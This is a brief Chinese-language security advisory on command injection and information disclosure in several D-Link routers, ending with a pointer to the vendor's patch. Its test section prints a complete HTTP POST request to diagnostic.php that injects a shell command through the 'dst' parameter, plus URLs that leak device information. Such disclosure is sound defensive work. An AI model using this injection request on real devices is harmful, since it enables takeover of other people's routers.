多个D-Link产品命令注入和信息泄露漏洞

受影响系统:
D-Link DIR-300
D-Link DIR-600
D-Link DIR-645
D-Link DIR-110
描述:
BUGTRAQ ID: 58938

D-Link是国际著名网络设备和解决方案提供商,产品包括多种路由器设备。

DIR-600/DIR-300 revB/DIR-815/DIR-645/DIR-412/DIR-456/DIR-110在实现上存在多个安全漏洞,攻击者可利用这些漏洞获取敏感信息并在受影响设备中执行任意命令。

1、OS命令注入

由于dst参数缺少输入验证和会话验证,可导致注入和执行任意shell命令。

2、信息泄露

某些server banner可轻易检测到某类设备。

3、信息泄露

通过网络可获取详细的设备信息。

<*来源:m-1-k-3 链接:http://cxsecurity.com/issue/WLB-2013040062 *>

测试方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

act=ping&amp;dst=%26%20COMMAND%26

http://www.example.com/DevInfo.txt or http://www.example.com/version.txt

建议:
厂商补丁:

D-Link
——
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.dlink.com/

评论关闭。